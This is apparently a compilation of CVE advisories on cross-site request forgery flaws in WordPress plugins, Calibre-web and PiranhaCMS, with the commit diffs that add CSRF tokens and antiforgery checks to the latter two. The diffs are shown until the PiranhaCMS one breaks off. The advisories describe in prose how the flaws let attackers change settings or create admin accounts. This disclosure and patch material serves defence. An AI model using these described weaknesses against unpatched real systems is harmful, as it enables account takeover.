The QR Redirector WordPress plugin before 1.6 does not have capability and CSRF checks when saving bulk QR Redirector settings via the qr_save_bulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects

CVE-2021-24853

The MouseWheel Smooth Scroll WordPress plugin before 5.7 does not have CSRF check in place on its settings page, which could allow attackers to make a logged in admin change them via a CSRF attack

CVE-2021-24852

The Colorful Categories WordPress plugin before 2.0.15 does not enforce nonce checks which could allow attackers to make a logged in admin or editor change taxonomy colors via a CSRF attack

CVE-2021-24802

The WP Performance Score Booster WordPress plugin before 2.1 does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

CVE-2021-24776

In Calibre-web, versions 0.6.0 to 0.6.13 are vulnerable to Cross-Site Request Forgery (CSRF). By luring an authenticated user to click on a link, an attacker can create a new user role with admin privileges and attacker-controlled credentials, allowing them to take over the application.

Permalink

Browse files

Added handling for missing flask-wtf dependency

Added CSRF protection (via flask-wtf)
Moved upload function to js file
Fixed error page in case of csrf failure

*   Loading branch information

Showing with **92 additions** and **38 deletions**.

1.  +1 −1 cps.py
2.  +17 −0 cps/\_\_init\_\_.py
3.  +13 −8 cps/about.py
4.  +8 −2 cps/kobo.py
5.  +0 −1 cps/static/js/edit\_books.js
6.  +20 −2 cps/static/js/main.js
7.  +1 −0 cps/templates/book\_edit.html
8.  +1 −0 cps/templates/book\_table.html
9.  +1 −0 cps/templates/config\_db.html
10.  +1 −0 cps/templates/config\_edit.html
11.  +3 −2 cps/templates/config\_view\_edit.html
12.  +2 −0 cps/templates/detail.html
13.  +8 −5 cps/templates/email\_edit.html
14.  +1 −1 cps/templates/http\_error.html
15.  +1 −12 cps/templates/layout.html
16.  +1 −0 cps/templates/list.html
17.  +1 −0 cps/templates/login.html
18.  +1 −0 cps/templates/register.html
19.  +1 −0 cps/templates/search\_form.html
20.  +1 −0 cps/templates/shelf\_edit.html
21.  +1 −0 cps/templates/user\_edit.html
22.  +1 −0 cps/templates/user\_table.html
23.  +2 −3 cps/web.py
24.  +1 −0 requirements.txt
25.  +4 −1 setup.cfg

@@ -49,7 +49,7 @@

from cps.kobo import kobo, get\_kobo\_activated

from cps.kobo\_auth import kobo\_auth

kobo\_available \= get\_kobo\_activated()

except ImportError:

except (ImportError, AttributeError): \# Catch also error for not installed flask-wtf (missing csrf decorator)

kobo\_available \= False

  

try:

@@ -43,6 +43,12 @@

except ImportError:

lxml\_present \= False

  

try:

from flask\_wtf.csrf import CSRFProtect

wtf\_present \= True

except ImportError:

wtf\_present \= False

  

mimetypes.init()

mimetypes.add\_type('application/xhtml+xml', '.xhtml')

mimetypes.add\_type('application/epub+zip', '.epub')

@@ -75,6 +81,12 @@

lm.anonymous\_user \= ub.Anonymous

lm.session\_protection \= 'strong'

  

if wtf\_present:

csrf \= CSRFProtect()

csrf.init\_app(app)

else:

csrf \= None

  

ub.init\_db(cli.settingspath)

\# pylint: disable=no-member

config \= config\_sql.load\_configuration(ub.session)

@@ -105,6 +117,11 @@ def create\_app():

log.info('\*\*\* "lxml" is needed for calibre-web to run. Please install it using pip: "pip install lxml" \*\*\*')

print('\*\*\* "lxml" is needed for calibre-web to run. Please install it using pip: "pip install lxml" \*\*\*')

sys.exit(6)

if not wtf\_present:

log.info('\*\*\* "flask-wtf" is needed for calibre-web to run. Please install it using pip: "pip install flask-wtf" \*\*\*')

print('\*\*\* "flask-wtf" is needed for calibre-web to run. Please install it using pip: "pip install flask-wtf" \*\*\*')

sys.exit(7)

  

app.wsgi\_app \= ReverseProxied(app.wsgi\_app)

\# For python2 convert path to unicode

if sys.version\_info < (3, 0):

@@ -29,6 +29,10 @@

import babel, pytz, requests, sqlalchemy

import werkzeug, flask, flask\_login, flask\_principal, jinja2

from flask\_babel import gettext as \_

try:

from flask\_wtf import \_\_version\_\_ as flaskwtf\_version

except ImportError:

flaskwtf\_version \= \_(u'not installed')

  

from . import db, calibre\_db, converter, uploader, server, isoLanguages, constants

from .render\_template import render\_title\_template

@@ -75,6 +79,7 @@

Flask\=flask.\_\_version\_\_,

Flask\_Login\=flask\_loginVersion,

Flask\_Principal\=flask\_principal.\_\_version\_\_,

Flask\_WTF\=flaskwtf\_version,

Werkzeug\=werkzeug.\_\_version\_\_,

Babel\=babel.\_\_version\_\_,

Jinja2\=jinja2.\_\_version\_\_,

@@ -84,14 +89,14 @@

SQLite\=sqlite3.sqlite\_version,

iso639\=isoLanguages.\_\_version\_\_,

pytz\=pytz.\_\_version\_\_,

Unidecode \= unidecode\_version,

Scholarly \= scholarly\_version,

Flask\_SimpleLDAP \= u'installed' if bool(services.ldap) else None,

python\_LDAP \= services.ldapVersion if bool(services.ldapVersion) else None,

Goodreads \= u'installed' if bool(services.goodreads\_support) else None,

jsonschema \= services.SyncToken.\_\_version\_\_ if bool(services.SyncToken) else None,

flask\_dance \= flask\_danceVersion,

greenlet \= greenlet\_Version

Unidecode\=unidecode\_version,

Scholarly\=scholarly\_version,

Flask\_SimpleLDAP\=u'installed' if bool(services.ldap) else None,

python\_LDAP\=services.ldapVersion if bool(services.ldapVersion) else None,

Goodreads\=u'installed' if bool(services.goodreads\_support) else None,

jsonschema\=services.SyncToken.\_\_version\_\_ if bool(services.SyncToken) else None,

flask\_dance\=flask\_danceVersion,

greenlet\=greenlet\_Version

)

\_VERSIONS.update(uploader.get\_versions())

  

@@ -47,7 +47,8 @@

from sqlalchemy.sql import select

import requests

  

from . import config, logger, kobo\_auth, db, calibre\_db, helper, shelf as shelf\_lib, ub

  

from . import config, logger, kobo\_auth, db, calibre\_db, helper, shelf as shelf\_lib, ub, csrf

from .constants import sqlalchemy\_version2

from .helper import get\_download\_link

from .services import SyncToken as SyncToken

@@ -505,7 +506,7 @@ def get\_metadata(book):

  

return metadata

  

  

@csrf.exempt

@kobo.route("/v1/library/tags", methods\=\["POST", "DELETE"\])

@requires\_kobo\_auth

\# Creates a Shelf with the given items, and returns the shelf's uuid.

@@ -595,6 +596,7 @@ def add\_items\_to\_shelf(items, shelf):

return items\_unknown\_to\_calibre

  

  

@csrf.exempt

@kobo.route("/v1/library/tags/<tag\_id>/items", methods\=\["POST"\])

@requires\_kobo\_auth

def HandleTagAddItem(tag\_id):

@@ -624,6 +626,7 @@ def HandleTagAddItem(tag\_id):

return make\_response('', 201)

  

  

@csrf.exempt

@kobo.route("/v1/library/tags/<tag\_id>/items/delete", methods\=\["POST"\])

@requires\_kobo\_auth

def HandleTagRemoveItem(tag\_id):

@@ -983,6 +986,7 @@ def HandleUnimplementedRequest(dummy=None):

  

  

\# TODO: Implement the following routes

@csrf.exempt

@kobo.route("/v1/user/loyalty/<dummy>", methods\=\["GET", "POST"\])

@kobo.route("/v1/user/profile", methods\=\["GET", "POST"\])

@kobo.route("/v1/user/wishlist", methods\=\["GET", "POST"\])

@@ -993,6 +997,7 @@ def HandleUserRequest(dummy=None):

return redirect\_or\_proxy\_request()

  

  

@csrf.exempt

@kobo.route("/v1/products/<dummy>/prices", methods\=\["GET", "POST"\])

@kobo.route("/v1/products/<dummy>/recommendations", methods\=\["GET", "POST"\])

@kobo.route("/v1/products/<dummy>/nextread", methods\=\["GET", "POST"\])

@@ -1026,6 +1031,7 @@ def make\_calibre\_web\_auth\_response():

)

  

  

@csrf.exempt

@kobo.route("/v1/auth/device", methods\=\["POST"\])

@requires\_kobo\_auth

def HandleAuthRequest():

@@ -23,7 +23,6 @@ if ($(".tiny\_editor").length) {

  

$(".datepicker").datepicker({

format: "yyyy-mm-dd",

language: language

}).on("change", function () {

// Show localized date over top of the standard YYYY-MM-DD date

var pubDate;

@@ -112,6 +112,14 @@ $("#btn-upload").change(function() {

$("#form-upload").submit();

});

  

$("#form-upload").uploadprogress({

redirect\_url: getPath() + "/", //"{{ url\_for('web.index')}}",

uploadedMsg: $("#form-upload").data("message"), //"{{\_('Upload done, processing, please wait...')}}",

modalTitle: $("#form-upload").data("title"), //"{{\_('Uploading...')}}",

modalFooter: $("#form-upload").data("footer"), //"{{\_('Close')}}",

modalTitleFailed: $("#form-upload").data("failed") //"{{\_('Error')}}"

});

  

$(document).ready(function() {

var inp \= $('#query').first()

if (inp.length) {

@@ -223,6 +231,16 @@ $(function() {

var preFilters \= $.Callbacks();

$.ajaxPrefilter(preFilters.fire);

  

// equip all post requests with csrf\_token

var csrftoken \= $("input\[name='csrf\_token'\]").val();

$.ajaxSetup({

beforeSend: function(xhr, settings) {

if (!/^(GET|HEAD|OPTIONS|TRACE)$/i.test(settings.type) && !this.crossDomain) {

xhr.setRequestHeader("X-CSRFToken", csrftoken)

}

}

});

  

function restartTimer() {

$("#spinner").addClass("hidden");

$("#RestartDialog").modal("hide");

@@ -576,7 +594,7 @@ $(function() {

method:"post",

dataType: "json",

url: window.location.pathname + "/../../ajax/simulatedbchange",

data: {config\_calibre\_dir: $("#config\_calibre\_dir").val()},

data: {config\_calibre\_dir: $("#config\_calibre\_dir").val(), csrf\_token: $("input\[name='csrf\_token'\]").val()},

success: function success(data) {

if ( data.change ) {

if ( data.valid ) {

@@ -712,7 +730,7 @@ $(function() {

method:"post",

contentType: "application/json; charset=utf-8",

dataType: "json",

url: window.location.pathname + "/../ajax/view",

url: getPath() + "/ajax/view",

data: "{\\"series\\": {\\"series\_view\\": \\""+ view +"\\"}}",

success: function success() {

location.reload();

@@ -23,6 +23,7 @@

{% if source\_formats|length \> 0 and conversion\_formats|length \> 0 %}

<div class\="text-center more-stuff"\><h4\>{{\_('Convert book format:')}}</h4\>

<form class\="padded-bottom" action\="{{ url\_for('editbook.convert\_bookformat', book\_id=book.id) }}" method\="post" id\="book\_convert\_frm"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group"\>

<div class\="text-left"\>

<label class\="control-label" for\="book\_format\_from"\>{{\_('Convert from:')}}</label\>

@@ -20,6 +20,7 @@

{% endblock %}

{% block body %}

<h2 class\="{{page}}"\>{{\_(title)}}</h2\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="col-xs-12 col-sm-6"\>

<div class\="row form-group"\>

<div class\="btn btn-default disabled" id\="merge\_books" aria-disabled\="true"\>{{\_('Merge selected books')}}</div\>

@@ -8,6 +8,7 @@

<div class\="discover"\>

<h2\>{{title}}</h2\>

<form role\="form" method\="POST" class\="col-md-10 col-lg-6" action\="{{ url\_for('admin.db\_configuration') }}" autocomplete\="off"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<label for\="config\_calibre\_dir"\>{{\_('Location of Calibre Database')}}</label\>

<div class\="form-group required input-group"\>

<input type\="text" class\="form-control" id\="config\_calibre\_dir" name\="config\_calibre\_dir" value\="{% if config.config\_calibre\_dir != None %}{{ config.config\_calibre\_dir }}{% endif %}" autocomplete\="off"\>

@@ -8,6 +8,7 @@

<div class\="discover"\>

<h2\>{{title}}</h2\>

<form role\="form" method\="POST" autocomplete\="off"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="panel-group col-md-10 col-lg-8"\>

<div class\="panel panel-default"\>

<div class\="panel-heading"\>

@@ -6,8 +6,9 @@

{% block body %}

<div class\="discover"\>

<h2\>{{title}}</h2\>

<form role\="form" method\="POST" autocomplete\="off" \>

<div class\="panel-group class="col-md-10 col-lg-6"\>

<form role\="form" method\="POST" autocomplete\="off" \>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="panel-group" class\="col-md-10 col-lg-6"\>

<div class\="panel panel-default"\>

<div class\="panel-heading"\>

<h4 class\="panel-title"\>

@@ -214,6 +214,7 @@ <h2 id="title">{{entry.title}}</h2>

<div class\="custom\_columns"\>

<p\>

<form id\="have\_read\_form" action\="{{ url\_for('web.toggle\_read', book\_id=entry.id)}}" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<label class\="block-label"\>

<input id\="have\_read\_cb" data-checked\="{{\_('Mark As Unread')}}" data-unchecked\="{{\_('Mark As Read')}}" type\="checkbox" {% if have\_read %}checked{% endif %} \>

<span\>{{\_('Read')}}</span\>

@@ -223,6 +224,7 @@ <h2 id="title">{{entry.title}}</h2>

{% if g.user.check\_visibility(32768) %}

<p\>

<form id\="archived\_form" action\="{{ url\_for('web.toggle\_archived', book\_id=entry.id)}}" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<label class\="block-label"\>

<input id\="archived\_cb" data-checked\="{{\_('Restore from archive')}}" data-unchecked\="{{\_('Add to archive')}}" type\="checkbox" {% if is\_archived %}checked{% endif %} \>

<span\>{{\_('Archived')}}</span\>

@@ -7,6 +7,7 @@

<div class\="discover"\>

<h1\>{{title}}</h1\>

<form role\="form" class\="col-md-10 col-lg-6" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

{% if feature\_support\['gmail'\] %}

<div class\="form-group"\>

<label for\="config\_email\_type"\>{{\_('Choose Server Type')}}</label\>

@@ -72,6 +73,7 @@ <h1>{{title}}</h1>

<div class\="col-md-10 col-lg-6"\>

<h2\>{{\_('Allowed Domains (Whitelist)')}}</h2\>

<form id\="domain\_add\_allow" action\="{{ url\_for('admin.add\_domain',allow=1)}}" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group required"\>

<label for\="domainname\_allow"\>{{\_('Add Domain')}}</label\>

<input type\="text" class\="form-control" name\="domainname" id\="domainname\_allow" \>

@@ -98,11 +100,12 @@ <h2>{{\_('Denied Domains (Blacklist)')}}</h2>

</thead\>

</table\>

<form id\="domain\_add\_deny" action\="{{ url\_for('admin.add\_domain',allow=0)}}" method\="POST"\>

<div class\="form-group required"\>

<label for\="domainname\_deny"\>{{\_('Add Domain')}}</label\>

<input type\="text" class\="form-control" name\="domainname" id\="domainname\_deny" \>

</div\>

<button id\="domain\_deny\_submit" class\="btn btn-default"\>{{\_('Add')}}</button\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group required"\>

<label for\="domainname\_deny"\>{{\_('Add Domain')}}</label\>

<input type\="text" class\="form-control" name\="domainname" id\="domainname\_deny" \>

</div\>

<button id\="domain\_deny\_submit" class\="btn btn-default"\>{{\_('Add')}}</button\>

</form\>

</div\>

  

@@ -1,5 +1,5 @@

<!DOCTYPE html\>

<html class\="http-error" lang\="{{ g.user.locale }}"\>

<html class\="http-error"\>

<head\>

<title\>{{ instance }} | HTTP Error ({{ error\_code }})</title\>

<meta charset\="utf-8"\>

@@ -61,7 +61,7 @@

{% if g.user.role\_upload() or g.user.role\_admin()%}

{% if g.allow\_upload %}

<li\>

<form id\="form-upload" class\="navbar-form" action\="{{ url\_for('editbook.upload') }}" method\="post" enctype\="multipart/form-data"\>

<form id\="form-upload" class\="navbar-form" action\="{{ url\_for('editbook.upload') }}" data-title\="{{\_('Uploading...')}}" data-footer\="{{\_('Close')}}" data-failed\="{{\_('Error')}}" data-message\="{{\_('Upload done, processing, please wait...')}}" method\="post" enctype\="multipart/form-data"\>

<div class\="form-group"\>

<span class\="btn btn-default btn-file"\>{{\_('Upload')}}<input id\="btn-upload" name\="btn-upload"

type\="file" accept\="{% for format in accept %}.{% if format != ''%}{{format}}{% else %}\*{% endif %}{{ ',' if not loop.last }}{% endfor %}" multiple\></span\>

@@ -200,17 +200,6 @@ <h4 class="modal-title" id="bookDetailsModalLabel">{{\_('Book Details')}}</h4>

<script src\="{{ url\_for('static', filename='js/libs/plugins.js') }}"\></script\>

<script src\="{{ url\_for('static', filename='js/libs/jquery.form.min.js') }}"\></script\>

<script src\="{{ url\_for('static', filename='js/uploadprogress.js') }}"\> </script\>

<script type\="text/javascript"\>

$(function() {

$("#form-upload").uploadprogress({

redirect\_url: "{{ url\_for('web.index')}}",

uploadedMsg: "{{\_('Upload done, processing, please wait...')}}",

modalTitle: "{{\_('Uploading...')}}",

modalFooter: "{{\_('Close')}}",

modalTitleFailed: "{{\_('Error')}}"

});

});

</script\>

<script src\="{{ url\_for('static', filename='js/main.js') }}"\></script\>

{% if g.current\_theme == 1 %}

<script src\="{{ url\_for('static', filename='js/libs/jquery.visible.min.js') }}"\></script\>

@@ -20,6 +20,7 @@ <h1 class="{{page}}">{{\_(title)}}</h1>

</div\>

  

{% if data == "series" %}

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<button class\="update-view btn btn-primary" data-target\="series\_view" id\="grid-button" data-view\="grid"\>Grid</button\>

{% endif %}

</div\>

@@ -4,6 +4,7 @@

<h2 style\="margin-top: 0"\>{{\_('Login')}}</h2\>

<form method\="POST" role\="form"\>

<input type\="hidden" name\="next" value\="{{next\_url}}"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group"\>

<label for\="username"\>{{\_('Username')}}</label\>

<input type\="text" class\="form-control" id\="username" name\="username" placeholder\="{{\_('Username')}}"\>

@@ -3,6 +3,7 @@

<div class\="well col-sm-6 col-sm-offset-2"\>

<h2 style\="margin-top: 0"\>{{\_('Register New Account')}}</h2\>

<form method\="POST" role\="form"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

{% if not config.config\_register\_email %}

<div class\="form-group required"\>

<label for\="name"\>{{\_('Username')}}</label\>

@@ -3,6 +3,7 @@

<h1 class\="{{page}}"\>{{title}}</h1\>

<div class\="col-md-10 col-lg-6"\>

<form role\="form" id\="search" action\="{{ url\_for('web.advanced\_search\_form') }}" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group"\>

<label for\="book\_title"\>{{\_('Book Title')}}</label\>

<input type\="text" class\="form-control" name\="book\_title" id\="book\_title" value\=""\>

@@ -3,6 +3,7 @@

<div class\="discover"\>

<h1\>{{title}}</h1\>

<form role\="form" method\="POST"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="form-group"\>

<label for\="title"\>{{\_('Title')}}</label\>

<input type\="text" class\="form-control" name\="title" id\="title" value\="{{ shelf.name if shelf.name != None }}"\>

@@ -3,6 +3,7 @@

<div class\="discover"\>

<h1\>{{title}}</h1\>

<form role\="form" method\="POST" autocomplete\="off"\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="col-md-10 col-lg-8"\>

{% if new\_user or ( g.user and content.name != "Guest" and g.user.role\_admin() ) %}

<div class\="form-group required"\>

@@ -118,6 +118,7 @@

{% endblock %}

{% block body %}

<h2 class\="{{page}}"\>{{\_(title)}}</h2\>

<input type\="hidden" name\="csrf\_token" value\="{{ csrf\_token() }}"\>

<div class\="col-xs-12 col-sm-12"\>

<div class\="row"\>

<div class\="btn btn-default disabled" id\="user\_delete\_selection" aria-disabled\="true"\>{{\_('Remove Selections')}}</div\>

CVE-2021-25965: Added handling for missing flask-wtf dependency · janeczku/calibre-web@50919d4

In PiranhaCMS, versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.

Permalink

Browse files

Merge pull request #1742 from PiranhaCMS/features/manager-security-up…

…date

Updated manager security. Fixes #1741

*   Loading branch information

Showing with **1,051 additions** and **630 deletions**.

1.  +2 −3 core/Piranha.Manager.LocalAuth/Areas/Manager/Pages/Login.cshtml.cs
2.  +1 −1 core/Piranha.Manager/Areas/Manager/Pages/Index.cshtml.cs
3.  +0 −1 core/Piranha.Manager/Areas/Manager/Shared/Partial/\_ContentPickerModal.cshtml
4.  +0 −1 core/Piranha.Manager/Areas/Manager/Shared/Partial/\_MediaPickerModal.cshtml
5.  +0 −1 core/Piranha.Manager/Areas/Manager/Shared/Partial/\_PagePickerModal.cshtml
6.  +0 −1 core/Piranha.Manager/Areas/Manager/Shared/Partial/\_PostPickerModal.cshtml
7.  +0 −1 core/Piranha.Manager/Areas/Manager/Shared/Partial/\_PreviewModal.cshtml
8.  +6 −1 core/Piranha.Manager/Areas/Manager/Shared/\_Layout.cshtml
9.  +1 −0 core/Piranha.Manager/Controllers/AliasApiController.cs
10.  +55 −0 core/Piranha.Manager/Controllers/AuthController.cs
11.  +21 −14 core/Piranha.Manager/Controllers/CommentApiController.cs
12.  +1 −0 core/Piranha.Manager/Controllers/ConfigApiController.cs
13.  +4 −3 core/Piranha.Manager/Controllers/ContentApiController.cs
14.  +51 −5 core/Piranha.Manager/Controllers/LanguageApiController.cs
15.  +5 −4 core/Piranha.Manager/Controllers/MediaApiController.cs
16.  +1 −0 core/Piranha.Manager/Controllers/ModuleApiController.cs
17.  +10 −9 core/Piranha.Manager/Controllers/PageApiController.cs
18.  +1 −0 core/Piranha.Manager/Controllers/PermissionApiController.cs
19.  +7 −6 core/Piranha.Manager/Controllers/PostApiController.cs
20.  +1 −0 core/Piranha.Manager/Controllers/SiteApiController.cs
21.  +166 −166 core/Piranha.Manager/{ → Extensions}/ManagerExtensions.cs
22.  +23 −6 core/Piranha.Manager/{ → Extensions}/ManagerStartupExtensions.cs
23.  +36 −0 core/Piranha.Manager/ManagerOptions.cs
24.  +5 −0 core/Piranha.Manager/Models/LanguageEditModel.cs
25.  +5 −5 core/Piranha.Manager/assets/dist/css/full.min.css
26.  +5 −5 core/Piranha.Manager/assets/dist/css/slim.min.css
27.  +43 −36 core/Piranha.Manager/assets/dist/js/piranha.alias.js
28.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.alias.min.js
29.  +53 −29 core/Piranha.Manager/assets/dist/js/piranha.comment.js
30.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.comment.min.js
31.  +5 −1 core/Piranha.Manager/assets/dist/js/piranha.components.js
32.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.components.min.js
33.  +8 −5 core/Piranha.Manager/assets/dist/js/piranha.config.js
34.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.config.min.js
35.  +6 −4 core/Piranha.Manager/assets/dist/js/piranha.contentedit.js
36.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.contentedit.min.js
37.  +5 −1 core/Piranha.Manager/assets/dist/js/piranha.contentlist.js
38.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.contentlist.min.js
39.  +61 −23 core/Piranha.Manager/assets/dist/js/piranha.js
40.  +52 −31 core/Piranha.Manager/assets/dist/js/piranha.media.js
41.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.media.min.js
42.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.min.js
43.  +30 −19 core/Piranha.Manager/assets/dist/js/piranha.pageedit.js
44.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.pageedit.min.js
45.  +6 −4 core/Piranha.Manager/assets/dist/js/piranha.pagelist.js
46.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.pagelist.min.js
47.  +29 −22 core/Piranha.Manager/assets/dist/js/piranha.postedit.js
48.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.postedit.min.js
49.  +10 −10 core/Piranha.Manager/assets/dist/js/piranha.siteedit.js
50.  +1 −1 core/Piranha.Manager/assets/dist/js/piranha.siteedit.min.js
51.  +5 −1 core/Piranha.Manager/assets/src/js/components/post-archive.vue
52.  +43 −36 core/Piranha.Manager/assets/src/js/piranha.alias.js
53.  +53 −29 core/Piranha.Manager/assets/src/js/piranha.comment.js
54.  +8 −5 core/Piranha.Manager/assets/src/js/piranha.config.js
55.  +6 −4 core/Piranha.Manager/assets/src/js/piranha.contentedit.js
56.  +5 −1 core/Piranha.Manager/assets/src/js/piranha.contentlist.js
57.  +1 −0 core/Piranha.Manager/assets/src/js/piranha.dropzone.js
58.  +23 −17 core/Piranha.Manager/assets/src/js/piranha.languageedit.js
59.  +52 −31 core/Piranha.Manager/assets/src/js/piranha.media.js
60.  +8 −5 core/Piranha.Manager/assets/src/js/piranha.mediapicker.js
61.  +7 −0 core/Piranha.Manager/assets/src/js/piranha.notifications.js
62.  +30 −19 core/Piranha.Manager/assets/src/js/piranha.pageedit.js
63.  +6 −4 core/Piranha.Manager/assets/src/js/piranha.pagelist.js
64.  +29 −22 core/Piranha.Manager/assets/src/js/piranha.postedit.js
65.  +10 −10 core/Piranha.Manager/assets/src/js/piranha.siteedit.js
66.  +22 −1 core/Piranha.Manager/assets/src/js/piranha.utils.js
67.  +3 −1 core/Piranha.Manager/assets/src/scss/inc/\_actions.scss
68.  +1 −1 core/Piranha.Manager/assets/src/scss/inc/\_notifications.scss
69.  +6 −3 identity/Piranha.AspNetCore.Identity/Areas/Manager/Views/Role/List.cshtml
70.  +2 −1 identity/Piranha.AspNetCore.Identity/Controllers/RoleController.cs
71.  +1 −0 identity/Piranha.AspNetCore.Identity/Controllers/UserController.cs
72.  +2 −6 identity/Piranha.AspNetCore.Identity/assets/piranha.useredit.js
73.  +1 −3 identity/Piranha.AspNetCore.Identity/assets/piranha.userlist.js

@@ -104,10 +104,9 @@ public async Task<IActionResult> OnPostAsync(string returnUrl = null)

  

if (!string.IsNullOrEmpty(returnUrl))

{

return LocalRedirect(returnUrl);

return LocalRedirect($"~/manager/login/auth?returnUrl\={ returnUrl }");

}

  

return new RedirectToPageResult("Index");

return LocalRedirect("~/manager/login/auth");

}

}

}

@@ -24,7 +24,7 @@ public IndexModel(IAuthorizationService service)

{

\_service \= service;

}

public async Task<IActionResult\> OnGet()

public async Task<IActionResult\> OnGet(string returnUrl \= null)

{

var items \= await Menu.Items.GetForUser(HttpContext.User, \_service);

  

@@ -1,6 +1,5 @@

@inject ManagerLocalizer Localizer

  



<div class\="modal modal-panel fade" id\="contentpicker"\>

<div class\="modal-dialog modal-lg"\>

<div class\="modal-content"\>

@@ -1,7 +1,6 @@

@inject IAuthorizationService Auth

@inject ManagerLocalizer Localizer

  



<div class\="modal modal-panel fade" id\="mediapicker"\>

<div class\="modal-dialog modal-lg"\>

<div class\="modal-content"\>

@@ -1,6 +1,5 @@

@inject ManagerLocalizer Localizer

  



<div class\="modal modal-panel fade" id\="pagepicker"\>

<div class\="modal-dialog modal-lg"\>

<div class\="modal-content"\>

@@ -1,6 +1,5 @@

@inject ManagerLocalizer Localizer

  



<div class\="modal modal-panel fade" id\="postpicker"\>

<div class\="modal-dialog modal-lg"\>

<div class\="modal-content"\>

@@ -1,7 +1,6 @@

@inject IAuthorizationService Auth

@inject ManagerLocalizer Localizer

  



<div class\="modal fade" id\="previewModal"\>

<div class\="modal-dialog modal-lg"\>

<div class\="modal-content"\>

@@ -1,4 +1,5 @@

@{

@inject Microsoft.Extensions.Options.IOptions<ManagerOptions\> Options

@{

var module \= Piranha.App.Modules.Get<Piranha.Manager.Module\>();

var prerelease \= Piranha.Utils.IsPreRelease(typeof(Piranha.Manager.Module).Assembly) ? "pre-release" : "";

var isRightToLeft \= @System.Globalization.CultureInfo.CurrentCulture.TextInfo.IsRightToLeft;

@@ -53,6 +54,10 @@

var piranha \= {};

window.piranha \= piranha;

piranha.baseUrl \= "@Url.Content("~/")";

piranha.antiForgery \= {

cookieName: "@Options.Value.XsrfCookieName",

headerName: "@Options.Value.XsrfHeaderName"

};

</script\>

  

<partial name\="~/Areas/Manager/Shared/Partial/\_EditorConfig.cshtml" />

@@ -25,6 +25,7 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/alias")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class AliasApiController : Controller

{

private readonly IApi \_api;

@@ -0,0 +1,55 @@

/\*

\* Copyright (c) .NET Foundation and Contributors

\*

\* This software may be modified and distributed under the terms

\* of the MIT license. See the LICENSE file for details.

\*

\* https://github.com/piranhacms/piranha.core

\*

\*/

  

using Microsoft.AspNetCore.Antiforgery;

using Microsoft.AspNetCore.Authorization;

using Microsoft.AspNetCore.Http;

using Microsoft.AspNetCore.Mvc;

using Microsoft.Extensions.Options;

  

namespace Piranha.Manager.Controllers

{

\[Area("Manager")\]

\[Route("manager/login/auth")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

public sealed class AuthController : Controller

{

private readonly IAntiforgery \_antiForgery;

private readonly ManagerOptions \_options;

  

/// <summary\>

/// Default constructor.

/// </summary\>

/// <param name\="antiforgery"\>The antiforgery service</param\>

/// <param name\="options"\>The manager options</param\>

public AuthController(IAntiforgery antiforgery, IOptions<ManagerOptions\> options)

{

\_antiForgery \= antiforgery;

\_options \= options.Value;

}

  

\[Route("{returnUrl?}")\]

\[HttpGet\]

public IActionResult SetAuthCookie(string returnUrl \= null)

{

var tokens \= \_antiForgery.GetAndStoreTokens(HttpContext);

Response.Cookies.Append(\_options.XsrfCookieName, tokens.RequestToken, new CookieOptions

{

HttpOnly \= false

});

if (!string.IsNullOrEmpty(returnUrl))

{

return LocalRedirect(returnUrl);

}

return LocalRedirect("~/manager");

}

}

}

@@ -24,8 +24,15 @@ namespace Piranha.Manager.Controllers

\[Route("manager/api/comment")\]

\[Authorize(Policy \= Permission.Admin)\]

\[ApiController\]

\[AutoValidateAntiforgeryToken\]

public class CommentApiController : Controller

{

public class ApprovalModel

{

public Guid Id { get; set; }

public Guid? ParentId { get; set; }

}

  

private readonly CommentService \_service;

private readonly ManagerLocalizer \_localizer;

  

@@ -50,14 +57,14 @@ public Task<CommentListModel> List(Guid? id = null)

return \_service.Get(id);

}

  

\[Route("approve/{id}/{parentId?}")\]

\[HttpGet\]

\[Route("approve")\]

\[HttpPost\]

\[Authorize(Policy \= Permission.CommentsApprove)\]

public async Task<CommentListModel\> Approve(Guid id, Guid? parentId \= null)

public async Task<CommentListModel\> Approve(ApprovalModel model)

{

await \_service.ApproveAsync(id);

